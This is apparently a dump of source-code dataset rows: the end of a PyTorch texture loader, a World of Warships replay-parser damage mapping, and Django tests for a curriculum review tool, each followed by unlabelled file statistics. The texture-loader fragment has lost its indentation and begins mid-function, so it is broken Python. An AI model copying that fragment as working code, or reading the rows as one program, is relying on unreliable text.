data["foreground"] = (data["foreground"] > 0).to(torch.long)
textures = []
indexes = random.sample(list(range(0, len(self.src_filelist))), min(self.config["num_texture"],len(self.src_filelist)) )
# indexes = random.sample(list(range(0, len(self.src_filelist))), self.config["num_texture"])
for i in indexes:
name = self.src_filelist[i]
texture = self.loader(os.path.join(src_root, "texture", name + ".png"), mode="RGB")
texture_tensor = F.to_tensor(texture)
texture_size = texture_tensor.size()[1] // 4
texture_tensor = texture_tensor.view(-1, 4, texture_size, 6, texture_size)
texture_tensor = texture_tensor.permute(1, 3, 0, 2, 4)
texture_tensor = texture_tensor
texture_tensor = texture_tensor.contiguous().view(24 * 3, texture_size, texture_size)
textures.append(texture_tensor)
data["texture"] = torch.stack(textures, dim=0)
data["class"] = 0
return data
| 41.140351
| 167
| 0.573324
| 2,599
| 21,105
| 4.509427
| 0.060793
| 0.088737
| 0.038396
| 0.046416
| 0.904778
| 0.879266
| 0.865529
| 0.853157
| 0.843345
| 0.843345
| 0
| 0.015767
| 0.281782
| 21,105
| 512
| 168
| 41.220703
| 0.757422
| 0.050272
| 0
| 0.808743
| 0
| 0
| 0.058521
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.062842
| false
| 0
| 0.027322
| 0.010929
| 0.161202
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
830cd6616e1ed15e089bbdc6c1a332394f8bd74d
| 3,327
|
py
|
Python
|
BigWorld/DamageCollection.py
|
kagurazakasanae/wows_replay_parser
|
8b9067b82fd898a35f0f7c54d05b7cf4919ac11d
|
[
"MIT"
] | 4
|
2020-03-16T16:07:39.000Z
|
2021-12-28T00:09:28.000Z
|
BigWorld/DamageCollection.py
|
kagurazakasanae/wows_replay_parser
|
8b9067b82fd898a35f0f7c54d05b7cf4919ac11d
|
[
"MIT"
] | null | null | null |
BigWorld/DamageCollection.py
|
kagurazakasanae/wows_replay_parser
|
8b9067b82fd898a35f0f7c54d05b7cf4919ac11d
|
[
"MIT"
] | 1
|
2020-07-16T22:44:35.000Z
|
2020-07-16T22:44:35.000Z
|
from BigWorld.BaseCollection import *
from BigWorld.DamageType import *
class DamageCollection(BaseCollection):
def getMap(self):
return {1:DAMAGE_MAIN_AP,
2:DAMAGE_MAIN_HE,
3:DAMAGE_AMK_AP,
4:DAMAGE_AMK_HE,
7:DAMAGE_SHIP_TORPEDO,
10:DAMAGE_AVIA_BOMB,
11:DAMAGE_AVIA_TORPEDO,
16:DAMAGE_FIRE,
17:DAMAGE_RAM,
19:DAMAGE_SINK}
def set(self, itemCode, value):
if itemCode not in self._items:
super(DamageCollection, self).set(itemCode, value)
super(DamageCollection, self).add(DAMAGE_ALL, value)
elif self._items[itemCode] < value:
prevValue = self.get(itemCode)
super(DamageCollection, self).set(itemCode, value)
super(DamageCollection, self).add(DAMAGE_ALL, value - prevValue)
class DamageCollection_0_6_12(DamageCollection):
def getMap(self):
return {1:DAMAGE_MAIN_AP,
2:DAMAGE_MAIN_HE,
3:DAMAGE_AMK_AP,
4:DAMAGE_AMK_HE,
7:DAMAGE_SHIP_TORPEDO,
11:DAMAGE_AVIA_BOMB,
12:DAMAGE_AVIA_TORPEDO,
17:DAMAGE_FIRE,
18:DAMAGE_RAM,
20:DAMAGE_SINK}
class DamageCollection_0_6_13(DamageCollection):
def getMap(self):
return {1:DAMAGE_MAIN_AP,
2:DAMAGE_MAIN_HE,
3:DAMAGE_AMK_AP,
4:DAMAGE_AMK_HE,
7:DAMAGE_SHIP_TORPEDO,
10:DAMAGE_AVIA_BOMB_AP,
11:DAMAGE_AVIA_BOMB_HE,
12:DAMAGE_AVIA_TORPEDO,
17:DAMAGE_FIRE,
18:DAMAGE_RAM,
20:DAMAGE_SINK}
def set(self, itemCode, value):
if itemCode not in self._items:
super(DamageCollection_0_6_13, self).set(itemCode, value)
if itemCode == DAMAGE_AVIA_BOMB_AP or itemCode == DAMAGE_AVIA_BOMB_HE:
super(DamageCollection_0_6_13, self).add(DAMAGE_AVIA_BOMB, value)
elif self._items[itemCode] < value:
prevValue = self.get(itemCode)
super(DamageCollection_0_6_13, self).set(itemCode, value)
if itemCode == DAMAGE_AVIA_BOMB_AP or itemCode == DAMAGE_AVIA_BOMB_HE:
super(DamageCollection_0_6_13, self).add(DAMAGE_AVIA_BOMB, value - prevValue)
class DamageCollection_0_8_0(DamageCollection_0_6_13):
def getMap(self):
return {1:DAMAGE_MAIN_AP,
2:DAMAGE_MAIN_HE,
3:DAMAGE_AMK_AP,
4:DAMAGE_AMK_HE,
7:DAMAGE_SHIP_TORPEDO,
10:DAMAGE_AVIA_ROCKET,
11:DAMAGE_AVIA_BOMB,
12:DAMAGE_AVIA_TORPEDO,
17:DAMAGE_FIRE,
18:DAMAGE_RAM,
20:DAMAGE_SINK,
28:DAMAGE_ROCKET}
class DamageCollection_0_8_2(DamageCollection_0_8_0):
def getMap(self):
return {1:DAMAGE_MAIN_AP,
2:DAMAGE_MAIN_HE,
3:DAMAGE_AMK_AP,
4:DAMAGE_AMK_HE,
7:DAMAGE_SHIP_TORPEDO,
10:DAMAGE_AVIA_BOMB_AP,
11:DAMAGE_AVIA_BOMB_HE,
12:DAMAGE_AVIA_TORPEDO,
17:DAMAGE_FIRE,
18:DAMAGE_RAM,
20:DAMAGE_SINK,
27:DAMAGE_AVIA_BOMB,
28:DAMAGE_AVIA_ROCKET,
32:DAMAGE_MAIN_CS}
| 31.990385
| 98
| 0.60024
| 409
| 3,327
| 4.506112
| 0.144254
| 0.113945
| 0.106348
| 0.065111
| 0.837222
| 0.803581
| 0.803581
| 0.803581
| 0.803581
| 0.803581
| 0
| 0.056
| 0.323715
| 3,327
| 103
| 99
| 32.300971
| 0.763111
| 0
| 0
| 0.758621
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.08046
| false
| 0
| 0.022989
| 0.057471
| 0.218391
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
83341c89a6762e547b5acf173eb819f610c73850
| 15,575
|
py
|
Python
|
crtool/tests/test_views.py
|
cfpb/curriculum-review-tool
|
3c55a55521078dadaa58439dcbfd564b54c43871
|
[
"CC0-1.0"
] | 3
|
2020-07-21T02:59:52.000Z
|
2021-08-18T18:42:48.000Z
|
crtool/tests/test_views.py
|
cfpb/curriculum-review-tool
|
3c55a55521078dadaa58439dcbfd564b54c43871
|
[
"CC0-1.0"
] | 6
|
2020-08-17T20:01:11.000Z
|
2021-05-04T19:58:39.000Z
|
crtool/tests/test_views.py
|
cfpb/curriculum-review-tool
|
3c55a55521078dadaa58439dcbfd564b54c43871
|
[
"CC0-1.0"
] | 1
|
2021-02-20T10:29:35.000Z
|
2021-02-20T10:29:35.000Z
|
import json
from django.test import RequestFactory, TestCase
from django.urls import reverse
from crtool.views import (
continue_review,
create_review,
get_review,
update_review,
)
class CreateReviewTest(TestCase):
def setUp(self):
self.factory = RequestFactory()
def post(self, post, ajax=False):
kwargs = {"HTTP_X_REQUESTED_WITH": "XMLHttpRequest"} if ajax else {}
kwargs['content_type'] = "application/json"
request = self.factory.post(reverse("create_review"), post, **kwargs)
return create_review(request)
def assertBadRequest(self, response, content=None):
self.assertEqual(response.status_code, 400)
if content:
self.assertEqual(response.content, content)
def assertCreateSuccess(self, response, compare={}, content=None):
data = json.loads(response.content.decode("utf-8"))
for k, v in compare.items():
if not self.assertEqual(data[k], compare[k]):
return False
return True
def check_post(self, post, response_check, ajax=False, compare={}, content=None): # noqa 501
if compare:
response_check(self.post(post, ajax=ajax), compare=compare, content=content) # noqa 501
else:
response_check(self.post(post, ajax=ajax), content=content)
def test_invalid_json(self):
kwargs = {
"HTTP_X_REQUESTED_WITH": "XMLHttpRequest",
"content_type": "application/json",
}
request = self.factory.post(
reverse("create_review"),
"invalid:json}",
**kwargs)
self.assertBadRequest(create_review(request), b"Invalid JSON")
def test_missing_title(self):
post = {
"tdp-crt_pubdate": "Jan 1, 2001",
"tdp-crt_grade": "Elementary school",
"tdp-crt_pass_code": "P455W0RD"
}
self.check_post(post, self.assertBadRequest)
def test_empty_title(self):
post = {
"tdp-crt_title": "",
"tdp-crt_pubdate": "Jan 1, 2001",
"tdp-crt_grade": "Elementary school",
"tdp-crt_pass_code": "P455W0RD"
}
self.check_post(post, self.assertBadRequest)
def test_long_title(self):
post = {
"tdp-crt_title": "Test title" * 100,
"tdp-crt_pubdate": "Jan 1, 2001",
"tdp-crt_grade": "Elementary school",
"tdp-crt_pass_code": "P455W0RD"
}
self.check_post(post, self.assertBadRequest, content=b"Too Large")
def test_missing_grade_level(self):
post = {
"tdp-crt_title": "Test title",
"tdp-crt_pubdate": "Jan 1, 2001",
"tdp-crt_pass_code": "P455W0RD"
}
self.check_post(post, self.assertBadRequest)
def test_empty_grade_level(self):
post = {
"tdp-crt_title": "Test title",
"tdp-crt_pubdate": "Jan 1, 2001",
"tdp-crt_grade": "",
"tdp-crt_pass_code": "P455W0RD"
}
self.check_post(post, self.assertBadRequest)
def test_create(self):
post = {
"tdp-crt_title": "Test title",
"tdp-crt_pubdate": "Jan 1, 2001",
"tdp-crt_grade": "Elementary school",
"tdp-crt_pass_code": "P455W0RD"
}
compare = {
"curriculumTitle": "Test title",
"publicationDate": "Jan 1, 2001",
"gradeRange": "Elementary school",
"pass_code": "P455W0RD"
}
self.check_post(post, self.assertCreateSuccess, compare=compare)
def test_missing_pubdate_and_passcode(self):
post = {
"tdp-crt_title": "Test title",
"tdp-crt_grade": "Elementary school",
}
compare = {
"curriculumTitle": "Test title",
"gradeRange": "Elementary school",
"publicationDate": "",
"pass_code": ""
}
self.check_post(post, self.assertCreateSuccess, compare=compare)
def test_empty_pubdate_and_passcode(self):
post = {
"tdp-crt_title": "Test title",
"tdp-crt_grade": "Elementary school",
"tdp-crt_pubdate": "",
"tdp-crt_pass_code": ""
}
compare = {
"curriculumTitle": "Test title",
"gradeRange": "Elementary school",
"publicationDate": "",
"pass_code": ""
}
self.check_post(post, self.assertCreateSuccess, compare=compare)
def test_missing_title_ajax(self):
post = {
"tdp-crt_pubdate": "Jan 1, 2001",
"tdp-crt_grade": "Elementary school",
"tdp-crt_pass_code": "P455W0RD"
}
self.check_post(post, self.assertBadRequest, ajax=True)
def test_empty_title_ajax(self):
post = {
"tdp-crt_title": "",
"tdp-crt_pubdate": "Jan 1, 2001",
"tdp-crt_grade": "Elementary school",
"tdp-crt_pass_code": "P455W0RD"
}
self.check_post(post, self.assertBadRequest, ajax=True)
def test_missing_grade_level_ajax(self):
post = {
"tdp-crt_title": "Test title",
"tdp-crt_pubdate": "Jan 1, 2001",
"tdp-crt_pass_code": "P455W0RD"
}
self.check_post(post, self.assertBadRequest, ajax=True)
def test_empty_grade_level_ajax(self):
post = {
"tdp-crt_title": "Test title",
"tdp-crt_pubdate": "Jan 1, 2001",
"tdp-crt_grade": "",
"tdp-crt_pass_code": "P455W0RD"
}
self.check_post(post, self.assertBadRequest, ajax=True)
def test_create_ajax(self):
post = {
"tdp-crt_title": "Test title",
"tdp-crt_pubdate": "Jan 1, 2001",
"tdp-crt_grade": "Elementary school",
"tdp-crt_pass_code": "P455W0RD"
}
compare = {
"curriculumTitle": "Test title",
"publicationDate": "Jan 1, 2001",
"gradeRange": "Elementary school",
"pass_code": "P455W0RD"
}
self.check_post(post, self.assertCreateSuccess, ajax=True, compare=compare) # noqa 501
def test_missing_pubdate_and_passcode_ajax(self):
post = {
"tdp-crt_title": "Test title",
"tdp-crt_grade": "Elementary school",
}
compare = {
"curriculumTitle": "Test title",
"gradeRange": "Elementary school",
"publicationDate": "",
"pass_code": ""
}
self.check_post(post, self.assertCreateSuccess, compare=compare, ajax=True) # noqa 501
def test_empty_pubdate_and_passcode_ajax(self):
post = {
"tdp-crt_title": "Test title",
"tdp-crt_grade": "Elementary school",
"tdp-crt_pubdate": "",
"tdp-crt_pass_code": ""
}
compare = {
"curriculumTitle": "Test title",
"gradeRange": "Elementary school",
"publicationDate": "",
"pass_code": ""
}
self.check_post(post, self.assertCreateSuccess, compare=compare, ajax=True) # noqa 501
class GetReviewTest(TestCase):
fixtures = ['crtool_initial_data']
def setUp(self):
self.factory = RequestFactory()
def post(self, post, ajax=False):
kwargs = {"HTTP_X_REQUESTED_WITH": "XMLHttpRequest"} if ajax else {}
request = self.factory.post(reverse("get_review"), post, **kwargs)
return get_review(request)
def check_post(self, post, response_check, compare={}):
if compare:
response_check(self.post(post), compare=compare)
else:
response_check(self.post(post))
def assertPageNotFound(self, response):
self.assertEqual(response.status_code, 404)
def assertGetSuccess(self, response, compare={}):
data = json.loads(response.content.decode("utf-8"))
for k, v in compare.items():
if not self.assertEqual(data[k], compare[k]):
return False
return True
# Test with token id that exists
def test_existing_id(self):
post = {
"token": "02d19cc1314747ef8aacb3",
}
compare = {
"id": "02d19cc1314747ef8aacb3",
"START": "Quality",
"pass_code": "",
"gradeRange": "High school",
"last_updated": "2020-08-06T00:59:22.576547+00:00",
"quality_status": "in progress",
"curriculumTitle": "Test",
"publicationDate": "",
"ls_modified_time": "2020-08-06T00:58:28.817Z",
"criterionClickedTitles": "{\"quality-crt-question-2\":\"clicked\"}", # noqa 501
"dimensionOverallScores": "{\"Quality\":\"limited\"}",
}
self.check_post(post, self.assertGetSuccess, compare=compare)
# Test with token id that doesn't exist
def test_non_existent_id(self):
post = {
"token": "02d19cc1314747ef8aacbz"
}
self.check_post(post, self.assertPageNotFound)
# Test with null
def test_null(self):
post = {
}
self.check_post(post, self.assertPageNotFound)
# Test with empty string
def test_empty_id(self):
post = {
"token": ""
}
self.check_post(post, self.assertPageNotFound)
# Test with short fake token id
def test_invalid_id(self):
post = {
"token": "apple"
}
self.check_post(post, self.assertPageNotFound)
class UpdateReviewTest(TestCase):
fixtures = ['crtool_initial_data']
def setUp(self):
self.factory = RequestFactory()
def post(self, post, ajax=False):
kwargs = {"HTTP_X_REQUESTED_WITH": "XMLHttpRequest"} if ajax else {}
kwargs['content_type'] = "application/json"
request = self.factory.post(reverse("update_review"), post, **kwargs)
return update_review(request)
def assertBadRequest(self, response, content=None):
self.assertEqual(response.status_code, 400)
if content:
self.assertEqual(response.content, content)
def assertPageNotFound(self, response, content=None):
self.assertEqual(response.status_code, 404)
def assertUpdateSuccess(self, response, compare={}, content=None):
data = json.loads(response.content.decode("utf-8"))
# Return False if updated review doesn't match comparison.
for k, v in compare.items():
if not self.assertEqual(data[k], compare[k]):
return False
# Return False if the last_updated date isn't updated.
if not self.assertGreater(data['last_updated'], compare['last_updated']): # noqa 501
return False
return True
def check_post(self, post, response_check, ajax=False, compare={}, content=None): # noqa 501
if compare:
response_check(self.post(post, ajax=ajax), compare=compare, content=content) # noqa 501
else:
response_check(self.post(post, ajax=ajax), content=content)
def test_invalid_json(self):
kwargs = {
"HTTP_X_REQUESTED_WITH": "XMLHttpRequest",
"content_type": "application/json",
}
request = self.factory.post(
reverse("update_review"),
"invalid:json}",
**kwargs)
self.assertBadRequest(update_review(request), b"Invalid JSON")
# Test with token id that exists
def test_update_title(self):
post = {
"id": "242449c9251243c1b512d2",
"pass_code": None,
"gradeRange": "Middle school",
"last_updated": "2020-07-12 04:52:56.858970+00:00",
"curriculumTitle": "Updated title",
"publicationDate": ""
}
self.check_post(post, self.assertUpdateSuccess, compare=post)
# Test with token id that doesn't exist
def test_non_existent_id(self):
post = {
"id": "6893d3af8eb54e74a27883",
"pass_code": None,
"gradeRange": "Middle school",
"last_updated": "2020-07-12 04:52:56.858970+00:00",
"curriculumTitle": "Updated title",
"publicationDate": ""
}
self.check_post(post, self.assertPageNotFound)
# Test with null token id
def test_null_id(self):
post = {
"id": None,
"pass_code": None,
"gradeRange": "Middle school",
"last_updated": "2020-07-12 04:52:56.858970+00:00",
"curriculumTitle": "Updated title",
"publicationDate": ""
}
self.check_post(post, self.assertPageNotFound)
# Test with missing token id
def test_missing_id(self):
post = {
"pass_code": None,
"gradeRange": "Middle school",
"last_updated": "2020-07-12 04:52:56.858970+00:00",
"curriculumTitle": "Updated title",
"publicationDate": ""
}
self.check_post(post, self.assertPageNotFound)
# Test with empty string token id
def test_empty_id(self):
post = {
"id": "",
"pass_code": None,
"gradeRange": "Middle school",
"last_updated": "2020-07-12 04:52:56.858970+00:00",
"curriculumTitle": "Updated title",
"publicationDate": ""
}
self.check_post(post, self.assertPageNotFound)
# Test with fake token id
def test_invalid_id(self):
post = {
"id": "apple",
"pass_code": None,
"gradeRange": "Middle school",
"last_updated": "2020-07-12 04:52:56.858970+00:00",
"curriculumTitle": "Updated title",
"publicationDate": ""
}
self.check_post(post, self.assertPageNotFound)
def test_overly_large_body(self):
post = {
"id": "242449c9251243c1b512d2",
"pass_code": None,
"gradeRange": "Middle school",
"last_updated": "2020-07-12 04:52:56.858970+00:00",
"curriculumTitle": "Updated title",
"publicationDate": "",
"junk": "0123456789" * 49000,
}
self.check_post(post, self.assertUpdateSuccess, compare=post)
post["junk"] = "0123456789" * 50000
self.check_post(post, self.assertBadRequest, content=b"Too Large")
# Test empty post
def test_empty_post(self):
post = {}
self.check_post(post, self.assertPageNotFound)
# Test empty post
def test_null_post(self):
post = None
self.check_post(post, self.assertPageNotFound)
class ContinueReviewTest(TestCase):
fixtures = ['crtool_initial_data']
def setUp(self):
self.factory = RequestFactory()
def post(self, post):
kwargs = {"HTTP_X_REQUESTED_WITH": "XMLHttpRequest"}
request = self.factory.post(reverse("continue_review"), post, **kwargs) # noqa 501
return continue_review(request)
def test_non_existent_pass_code(self):
post = {
"access_code": "fakefake",
}
response = self.post(post)
self.assertEqual(response.status_code, 404)
def test_found_pass_code(self):
post = {
"access_code": "1da8305db6774e46970ec3",
}
response = self.post(post)
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "../tool/#id=1da8305db6774e46970ec3")
| 33.56681
| 100
| 0.575345
| 1,630
| 15,575
| 5.328834
| 0.102454
| 0.03592
| 0.044209
| 0.058715
| 0.82892
| 0.806931
| 0.772853
| 0.745913
| 0.723808
| 0.683974
| 0
| 0.048637
| 0.300353
| 15,575
| 463
| 101
| 33.639309
| 0.748463
| 0.034928
| 0
| 0.667532
| 0
| 0
| 0.245185
| 0.037388
| 0
| 0
| 0
| 0
| 0.135065
| 1
| 0.132468
| false
| 0.085714
| 0.01039
| 0
| 0.18961
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.